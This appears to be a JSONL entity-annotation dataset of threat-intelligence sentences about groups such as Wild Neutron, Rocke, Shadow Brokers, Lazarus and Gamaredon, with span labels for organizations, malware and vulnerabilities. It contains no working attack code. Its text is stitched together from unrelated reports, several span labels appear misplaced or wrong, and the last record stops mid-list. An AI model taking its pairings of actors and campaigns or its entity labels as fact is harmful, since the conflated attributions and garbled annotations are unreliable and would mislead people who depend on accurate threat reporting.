{"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": [{"start": 104, "end": 117, "label": "System"}, {"start": 156, "end": 168, "label": "Organization"}, {"start": 195, "end": 226, "label": "Malware"}, {"start": 250, "end": 261, "label": "Organization"}, {"start": 288, "end": 300, "label": "System"}, {"start": 301, "end": 308, "label": "Vulnerability"}]}
{"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": [{"start": 45, "end": 56, "label": "Organization"}]}
{"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": [{"start": 98, "end": 110, "label": "Organization"}, {"start": 141, "end": 145, "label": "System"}, {"start": 146, "end": 154, "label": "Vulnerability"}, {"start": 155, "end": 162, "label": "Vulnerability"}]}
{"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": [{"start": 52, "end": 88, "label": "Vulnerability"}]}
{"text": "Once the C2 connection is established , malware used by the Rocke group downloads shell script named as \" a7 \" to the victim machine . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB .", "spans": [{"start": 60, "end": 65, "label": "Organization"}, {"start": 106, "end": 108, "label": "System"}, {"start": 135, "end": 147, "label": "Organization"}, {"start": 167, "end": 193, "label": "Malware"}, {"start": 198, "end": 220, "label": "Malware"}, {"start": 225, "end": 262, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 274, "end": 277, "label": "Malware"}]}
{"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": [{"start": 117, "end": 122, "label": "System"}, {"start": 123, "end": 131, "label": "Vulnerability"}, {"start": 201, "end": 205, "label": "System"}, {"start": 206, "end": 214, "label": "Vulnerability"}, {"start": 274, "end": 287, "label": "Organization"}, {"start": 300, "end": 328, "label": "Vulnerability"}]}
{"text": "Public cloud infrastructure is one of the main targets for Rocke . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": [{"start": 59, "end": 64, "label": "Organization"}, {"start": 120, "end": 122, "label": "Organization"}, {"start": 127, "end": 159, "label": "Organization"}, {"start": 238, "end": 250, "label": "Organization"}]}
{"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" \u2013 a malware threat group specializing in cryptomining . Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 171, "end": 183, "label": "Organization"}, {"start": 186, "end": 204, "label": "Organization"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 220, "end": 235, "label": "Organization"}, {"start": 244, "end": 277, "label": "Organization"}, {"start": 286, "end": 303, "label": "Organization"}]}
{"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group . We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 101, "end": 110, "label": "System"}, {"start": 217, "end": 235, "label": "Organization"}]}
{"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 126, "end": 142, "label": "Vulnerability"}, {"start": 173, "end": 180, "label": "Malware"}]}
{"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit . PyLocky was found to be targeting entities in France and Germany .", "spans": [{"start": 15, "end": 27, "label": "System"}, {"start": 184, "end": 191, "label": "Malware"}]}
{"text": "The group also made it back into the news with the recent WannaCry ransomware that targeted computers around the globe ; it piggybacked on exploits revealed by the Shadow Brokers . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information .", "spans": [{"start": 58, "end": 77, "label": "System"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}]}
{"text": "A mysterious hacker or hackers going by the name \" The Shadow Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": [{"start": 116, "end": 119, "label": "Organization"}, {"start": 162, "end": 167, "label": "Organization"}]}
{"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": [{"start": 127, "end": 132, "label": "Organization"}]}
{"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": [{"start": 86, "end": 98, "label": "Vulnerability"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 225, "end": 244, "label": "Organization"}]}
{"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 63, "end": 80, "label": "System"}]}
{"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 60, "end": 74, "label": "Organization"}, {"start": 117, "end": 131, "label": "Organization"}, {"start": 148, "end": 167, "label": "Organization"}, {"start": 180, "end": 186, "label": "Organization"}, {"start": 253, "end": 255, "label": "System"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 385, "end": 392, "label": "Indicator"}, {"start": 477, "end": 479, "label": "System"}, {"start": 523, "end": 526, "label": "Indicator"}, {"start": 570, "end": 585, "label": "Indicator"}, {"start": 659, "end": 665, "label": "Indicator"}, {"start": 788, "end": 792, "label": "Indicator"}, {"start": 793, "end": 801, "label": "Malware"}, {"start": 921, "end": 927, "label": "Malware"}, {"start": 945, "end": 952, "label": "Indicator"}, {"start": 1032, "end": 1035, "label": "System"}]}
{"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . ined in the archive is called DriverInstallerU.exe\u201d but its metadata shows that its original name is Interenet Assistant.exe\u201d . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . These unknown actors continued launching DDoS attacks over the next few years . For simplicity , Kaspersky is calling them the BlackEnergy APT group . Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . DoNot Team\u2019s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 101, "end": 116, "label": "Organization"}, {"start": 144, "end": 162, "label": "Indicator"}, {"start": 197, "end": 200, "label": "System"}, {"start": 212, "end": 227, "label": "Indicator"}, {"start": 347, "end": 351, "label": "Indicator"}, {"start": 356, "end": 358, "label": "System"}, {"start": 513, "end": 520, "label": "Malware"}, {"start": 616, "end": 621, "label": "Organization"}, {"start": 735, "end": 756, "label": "Indicator"}, {"start": 806, "end": 830, "label": "Indicator"}, {"start": 919, "end": 928, "label": "Organization"}, {"start": 938, "end": 956, "label": "Organization"}, {"start": 1212, "end": 1219, "label": "Indicator"}, {"start": 1222, "end": 1229, "label": "Indicator"}, {"start": 1240, "end": 1247, "label": "Indicator"}, {"start": 1270, "end": 1279, "label": "Organization"}, {"start": 1610, "end": 1624, "label": "Organization"}, {"start": 1701, "end": 1710, "label": "Organization"}, {"start": 1822, "end": 1833, "label": "Organization"}, {"start": 1896, "end": 1902, "label": "Malware"}, {"start": 2109, "end": 2120, "label": "Organization"}, {"start": 2256, "end": 2267, "label": "Organization"}, {"start": 2298, "end": 2309, "label": "Organization"}, {"start": 2527, "end": 2536, "label": "Organization"}, {"start": 2566, "end": 2577, "label": "Organization"}, {"start": 2657, "end": 2664, "label": "Organization"}, {"start": 2842, "end": 2847, "label": "Organization"}, {"start": 2853, "end": 2863, "label": "Organization"}, {"start": 2982, "end": 2989, "label": "Organization"}, {"start": 3070, "end": 3077, "label": "Organization"}, {"start": 3113, "end": 3120, "label": "Vulnerability"}, {"start": 3123, "end": 3136, "label": "Vulnerability"}, {"start": 3310, "end": 3317, "label": "Organization"}, {"start": 3342, "end": 3352, "label": "Organization"}, {"start": 3357, "end": 3362, "label": "Organization"}, {"start": 3394, "end": 3419, "label": "Organization"}, {"start": 3427, "end": 3434, "label": "Organization"}, {"start": 3449, "end": 3459, "label": "Organization"}, {"start": 3529, "end": 3536, "label": "Organization"}, {"start": 3578, "end": 3600, "label": "Organization"}, {"start": 3727, "end": 3734, "label": "Organization"}, {"start": 3842, "end": 3849, "label": "Organization"}, {"start": 3991, "end": 4001, "label": "Organization"}, {"start": 4067, "end": 4076, "label": "Organization"}, {"start": 4087, "end": 4097, "label": "Organization"}, {"start": 4141, "end": 4152, "label": "Organization"}, {"start": 4244, "end": 4257, "label": "Vulnerability"}, {"start": 4347, "end": 4357, "label": "Organization"}, {"start": 4406, "end": 4420, "label": "Organization"}, {"start": 4453, "end": 4460, "label": "Organization"}, {"start": 4489, "end": 4501, "label": "Organization"}, {"start": 4521, "end": 4531, "label": "Organization"}, {"start": 4568, "end": 4580, "label": "Organization"}, {"start": 4609, "end": 4621, "label": "Organization"}, {"start": 4636, "end": 4652, "label": "Malware"}, {"start": 4731, "end": 4736, "label": "Organization"}, {"start": 4783, "end": 4797, "label": "Organization"}, {"start": 4856, "end": 4874, "label": "Organization"}, {"start": 4877, "end": 4895, "label": "Organization"}, {"start": 4902, "end": 4910, "label": "Organization"}, {"start": 4972, "end": 4986, "label": "Organization"}, {"start": 5021, "end": 5052, "label": "Organization"}, {"start": 5064, "end": 5081, "label": "Organization"}, {"start": 5213, "end": 5218, "label": "Organization"}, {"start": 5257, "end": 5263, "label": "System"}, {"start": 5661, "end": 5677, "label": "Organization"}, {"start": 5839, "end": 5849, "label": "Organization"}, {"start": 6058, "end": 6079, "label": "Organization"}, {"start": 6099, "end": 6104, "label": "Organization"}, {"start": 6134, "end": 6136, "label": "Indicator"}]}
{"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35 ) , a suspected Indian APT group .", "spans": [{"start": 31, "end": 36, "label": "System"}, {"start": 90, "end": 93, "label": "Organization"}, {"start": 137, "end": 150, "label": "System"}, {"start": 197, "end": 205, "label": "System"}, {"start": 277, "end": 279, "label": "Indicator"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 336, "end": 346, "label": "Organization"}, {"start": 352, "end": 360, "label": "Organization"}]}
{"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . First attack of this campaign took place in May 2018 . Arbor also published APT research on this group , and named it \u2018Donot\u2019 . Donot attacked government agencies , aiming for classified intelligence . We identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for Cyber Espionage . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . In the latest attack , Donot group is targeting Pakistani businessman working in China . Two unique malware frameworks , EHDevel and yty , are developed by attackers . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Our previous post on Sofacy's 2017 activity stepped aACT from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown . Either ACT , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . Either ACT , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . According to this new alert , Hidden Cobra the U.S. government\u2019s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . Lazarus is a very active attack group involved in both cyber crime and espionage . The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . In recent years , Lazarus has also become involved in financially motivated attacks . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Gamaredon Group is an alleged Russian threat group . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user\u2019s microphone and the ability to download and execute further modules . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . Gamaredon Group's implants are characterized by the employment of information stealing tools \u2014 among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . We can observe that the sample is very recent , created on Thursday , July 4 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . Cylance determined that the \u2018Ghost Dragon\u2019 group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes \u2018Gh0st\u2019 as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years. However , Symantec has now found evidence that the Buckeye Cyber Espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 230, "end": 244, "label": "Organization"}, {"start": 281, "end": 302, "label": "Malware"}, {"start": 672, "end": 705, "label": "Organization"}, {"start": 784, "end": 789, "label": "Organization"}, {"start": 932, "end": 937, "label": "Organization"}, {"start": 995, "end": 1002, "label": "Organization"}, {"start": 1005, "end": 1010, "label": "Organization"}, {"start": 1020, "end": 1039, "label": "Organization"}, {"start": 1117, "end": 1127, "label": "Organization"}, {"start": 1308, "end": 1322, "label": "Malware"}, {"start": 1323, "end": 1329, "label": "System"}, {"start": 1428, "end": 1439, "label": "Organization"}, {"start": 1453, "end": 1474, "label": "Organization"}, {"start": 1526, "end": 1533, "label": "Malware"}, {"start": 1538, "end": 1541, "label": "Malware"}, {"start": 1561, "end": 1570, "label": "Organization"}, {"start": 1573, "end": 1584, "label": "Indicator"}, {"start": 1590, "end": 1602, "label": "Malware"}, {"start": 1658, "end": 1660, "label": "System"}, {"start": 1720, "end": 1731, "label": "Indicator"}, {"start": 1786, "end": 1788, "label": "System"}, {"start": 1892, "end": 1907, "label": "Organization"}, {"start": 2053, "end": 2060, "label": "Organization"}, {"start": 2089, "end": 2104, "label": "Organization"}, {"start": 2304, "end": 2309, "label": "Organization"}, {"start": 2312, "end": 2319, "label": "Organization"}, {"start": 2441, "end": 2446, "label": "Organization"}, {"start": 2449, "end": 2453, "label": "Organization"}, {"start": 2513, "end": 2519, "label": "Organization"}, {"start": 2595, "end": 2599, "label": "Organization"}, {"start": 2602, "end": 2610, "label": "Organization"}, {"start": 2617, "end": 2624, "label": "Organization"}, {"start": 2720, "end": 2728, "label": "Organization"}, {"start": 3099, "end": 3103, "label": "Organization"}, {"start": 3282, "end": 3289, "label": "Organization"}, {"start": 3302, "end": 3322, "label": "Organization"}, {"start": 3528, "end": 3535, "label": "Organization"}, {"start": 3690, "end": 3704, "label": "Organization"}, {"start": 3709, "end": 3730, "label": "Malware"}, {"start": 3768, "end": 3787, "label": "Organization"}, {"start": 3790, "end": 3808, "label": "Organization"}, {"start": 3815, "end": 3823, "label": "Organization"}, {"start": 4059, "end": 4067, "label": "Organization"}, {"start": 4212, "end": 4224, "label": "Organization"}, {"start": 4364, "end": 4369, "label": "Organization"}, {"start": 4411, "end": 4418, "label": "Organization"}, {"start": 4732, "end": 4741, "label": "Organization"}, {"start": 4757, "end": 4766, "label": "Organization"}, {"start": 4793, "end": 4800, "label": "Organization"}, {"start": 4910, "end": 4933, "label": "Organization"}, {"start": 4942, "end": 4950, "label": "Malware"}, {"start": 5025, "end": 5032, "label": "Indicator"}, {"start": 5037, "end": 5045, "label": "Indicator"}, {"start": 5161, "end": 5168, "label": "Organization"}, {"start": 5193, "end": 5199, "label": "Organization"}, {"start": 5331, "end": 5338, "label": "Organization"}, {"start": 5436, "end": 5443, "label": "Organization"}, {"start": 5494, "end": 5499, "label": "Malware"}, {"start": 5704, "end": 5713, "label": "Organization"}, {"start": 5719, "end": 5726, "label": "Malware"}, {"start": 5833, "end": 5840, "label": "Organization"}, {"start": 5869, "end": 5880, "label": "Organization"}, {"start": 5906, "end": 5913, "label": "Malware"}, {"start": 5944, "end": 5951, "label": "Organization"}, {"start": 6062, "end": 6069, "label": "Organization"}, {"start": 6115, "end": 6138, "label": "Organization"}, {"start": 6192, "end": 6199, "label": "Organization"}, {"start": 6299, "end": 6310, "label": "Vulnerability"}, {"start": 6311, "end": 6318, "label": "Vulnerability"}, {"start": 6358, "end": 6365, "label": "System"}, {"start": 6366, "end": 6379, "label": "Vulnerability"}, {"start": 6384, "end": 6397, "label": "Vulnerability"}, {"start": 6581, "end": 6588, "label": "Organization"}, {"start": 6841, "end": 6848, "label": "Organization"}, {"start": 6891, "end": 6907, "label": "Organization"}, {"start": 7117, "end": 7125, "label": "Organization"}, {"start": 7143, "end": 7150, "label": "Organization"}, {"start": 7345, "end": 7351, "label": "Organization"}, {"start": 7446, "end": 7456, "label": "Malware"}, {"start": 7630, "end": 7648, "label": "Indicator"}, {"start": 8073, "end": 8081, "label": "Malware"}, {"start": 8118, "end": 8128, "label": "Organization"}, {"start": 8149, "end": 8160, "label": "Malware"}, {"start": 8301, "end": 8314, "label": "Organization"}, {"start": 8566, "end": 8576, "label": "Organization"}, {"start": 8593, "end": 8602, "label": "Organization"}, {"start": 8724, "end": 8731, "label": "Indicator"}, {"start": 8736, "end": 8745, "label": "Organization"}, {"start": 8754, "end": 8769, "label": "Organization"}, {"start": 8807, "end": 8822, "label": "Organization"}, {"start": 8915, "end": 8935, "label": "Organization"}, {"start": 8938, "end": 8949, "label": "Organization"}, {"start": 8974, "end": 8993, "label": "Malware"}, {"start": 8996, "end": 9009, "label": "Malware"}, {"start": 9021, "end": 9046, "label": "Malware"}, {"start": 9132, "end": 9147, "label": 